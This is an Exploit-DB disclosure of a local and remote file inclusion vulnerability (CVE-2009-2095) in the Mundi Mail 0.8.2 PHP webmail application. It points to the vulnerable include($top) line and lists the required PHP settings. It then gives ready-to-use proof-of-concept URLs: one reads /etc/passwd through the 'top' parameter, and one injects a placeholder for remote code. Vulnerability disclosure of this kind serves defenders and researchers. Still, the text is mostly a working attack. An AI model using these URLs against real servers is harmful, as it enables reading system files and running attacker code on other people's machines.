Mundi Mail 0.8.2 top Remote File Inclusion Vulnerability

2009-06-15T00:00:00
ID EDB-ID:8948
Type exploitdb
Reporter Br0ly
Modified 2009-06-15T00:00:00

Description

Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability. CVE-2009-2095. Webapps exploit for php platform

                                        
                                            ----------------------------------------------------------------------------------------------------------


  Name : Mundi Mail
  Site : http://sourceforge.net/projects/mundimail/

  Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732


----------------------------------------------------------------------------------------------------------


 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com


----------------------------------------------------------------------------------------------------------


  Description:

  Bug : Local/Remote File Inclusion

 template/simpledefault/admin/_masterlayout.php:10:	include($top);




  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;  



----------------------------------------------------------------------------------------------------------


  P0c:
 
    LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd

    RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]


  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-15]